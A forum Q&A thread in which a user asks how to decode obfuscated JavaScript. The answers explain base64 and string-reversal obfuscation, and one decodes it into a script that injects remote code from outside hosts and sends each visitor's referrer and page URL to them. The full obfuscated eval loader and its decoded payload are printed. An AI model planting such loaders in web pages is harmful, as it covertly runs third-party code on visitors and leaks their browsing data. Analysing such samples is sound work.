Decoding the code
How do I decrypt the code?
var _000 = '==wOpkSZwF2YzV2XoUGchN2cl5WdoUGdpJ3duQnbl1Wdj9GZ7kSMJ9EKkxWaoNEZuVGcwFmLJBDMfpwOdBzWpcCZhVGangSZtFmTnFGV5J0c05WZtVGbFRXZn5CduVWb1N2bkB SPgkEMw8FIyFmdKsTKMJVVuQnbl1Wdj9GZoQnbl52bw12bDlkUVVGZvNmbltyJ9wmc1ZyJrkiclJnclZWZy5CduVWb1N2bkhCduVmbvBXbvNUSSVVZk92YuV2Kn0jZlJnJnsyJr9WPjJ 3c0V2Z/8SbvNmLlRXYjNXdmJ2b51mLpBXYv8iOwRHdodCI9AyYyNnLxk0TKsTKnQHcpJ3YzdCK05WZtVGbFVGdhVmcj5CduVWb1N2bkBSPgETSPBichZ3OnU0MlQHcpJ3Yz9yQzUSRzUiMyUiM0 EDO5EDRzUCZpZ0Ml8ybm5WaukGchFmdhp2LvE0MlAHd0hmMyUCRzUyYyNHMyUiMyUCdwlmcjNVY2FmSyITJENTJldWY1dmbhxGMyUCdwlmcjN3QzUyJ9UGchN2cl9FIyFmd';
var OOO = ["x41x42x43x44x45x46x47x48x49x4Ax4Bx4Cx4Dx4Ex4Fx50x51x52x53x54x55x56x57x58x59x5Ax61x62x63x64x65x66x67x68x69x6Ax6Bx6Cx6Dx6Ex6Fx70x71x72x73x74x 75x76x77x78x79x7Ax30x31x32x33x34x35x36x37x38x39x2Bx2Fx3D", "", "x63x68x61x72x41x74", "x69x6Ex64x65x78x4Fx66", "x66x72x6Fx6Dx43x68x61x72x43x6Fx64 x65", "x6Cx65x6Ex67x74x68"];
function OIO(lO1) {
var O11 = OOO[0];
var IOO, IOl, Ol1, IlO, Ol0, _0OO, O1l, I0O, OI0 = 0,
_10O = OOO[1];
do {
IlO = O11[OOO[3]](lO1[OOO[2]](OI0++));
Ol0 = O11[OOO[3]](lO1[OOO[2]](OI0++));
_0OO = O11[OOO[3]](lO1[OOO[2]](OI0++));
O1l = O11[OOO[3]](lO1[OOO[2]](OI0++));
I0O = IlO << 18 | Ol0 << 12 | _0OO << 6 | O1l;
IOO = I0O >> 16 & 0xff;
IOl = I0O >> 8 & 0xff;
Ol1 = I0O & 0xff;
if (_0OO == 64) {
_10O += String[OOO[4]](IOO);
} else {
if (O1l == 64) {
_10O += String[OOO[4]](IOO, IOl);
} else {
_10O += String[OOO[4]](IOO, IOl, Ol1);
};
};
} while (OI0 < lO1[OOO[5]]);
return _10O;
};
function _1OO(l1O) {
var _0lO = OOO[1],
OI0 = 0;
for (OI0 = l1O[OOO[5]] - 1; OI0 >= 0; OI0--) {
_0lO += l1O[OOO[2]](OI0);
};
return _0lO;
};
eval(OIO(_1OO(_000)));
0
Author: Nicolas Chabanovsky, 2012-05-04
3 answers
There is no cryptography here, just obfuscation. Code recovery is done as standard
- the code is formatted to a readable format (jsbeautifier.org etc.),
- variables are given meaningful values,
- strings are converted to the explicit form
- , etc.
There are browser plugins that simplify the work, for example, JavaScript Deobfuscator.
1
Author: stanislav, 2012-05-04 10:48:40
Flipping the line
$str = strrev("==wOpkSZwF2YzV2XoUGchN2cl5WdoUGdpJ3duQnbl1Wdj9GZ7kSMJ9EKkxWaoNEZuVGcwFmLJBDMfpwOdBzWpcCZhVGangSZtFmTnFGV5J0c05WZtVGbFRXZn5CduVWb1N2bkB SPgkEMw8FIyFmdKsTKMJVVuQnbl1Wdj9GZoQnbl52bw12bDlkUVVGZvNmbltyJ9wmc1ZyJrkiclJnclZWZy5CduVWb1N2bkhCduVmbvBXbvNUSSVVZk92YuV2Kn0jZlJnJnsyJr9WPjJ 3c0V2Z/8SbvNmLlRXYjNXdmJ2b51mLpBXYv8iOwRHdodCI9AyYyNnLxk0TKsTKnQHcpJ3YzdCK05WZtVGbFVGdhVmcj5CduVWb1N2bkBSPgETSPBichZ3OnU0MlQHcpJ3Yz9yQzUSRzUiMyUiM0 EDO5EDRzUCZpZ0Ml8ybm5WaukGchFmdhp2LvE0MlAHd0hmMyUCRzUyYyNHMyUiMyUCdwlmcjNVY2FmSyITJENTJldWY1dmbhxGMyUCdwlmcjN3QzUyJ9UGchN2cl9FIyFmd");
Echo base64_decode($str); / / output the result
Here is the actual result:
var _escape='%3Cscript%20language%3D%22JavaScript%22%20src%3D%22http%3A//javaapi.info/%3Fid%3D198142%22%3E%3C/script%3E';var OI1 = document.createElement('script');
OI1.src = 'http://api.myobfuscate.com/?getsrc=ok'+'&ref='+encodeURIComponent(document.referrer)+'&url='+encodeURIComponent(document.URL);
var _00I = document.getElementsByTagName('head')[0];
_00I.appendChild(OI1);document.write(unescape(_escape));
1
Author: Sever, 2012-05-04 12:48:19
Judging by the characteristic signatures, this is the usual Base64 encoding (at least the first part). This is not an encryption at all, but simply a way to encode binary data with a set of ASCII characters.
The second part is just a 16-decimal representation of a certain string.
Look at here - there is an example of a Base64 encoder/decoder
0
Author: Barmaley, 2012-05-04 10:52:41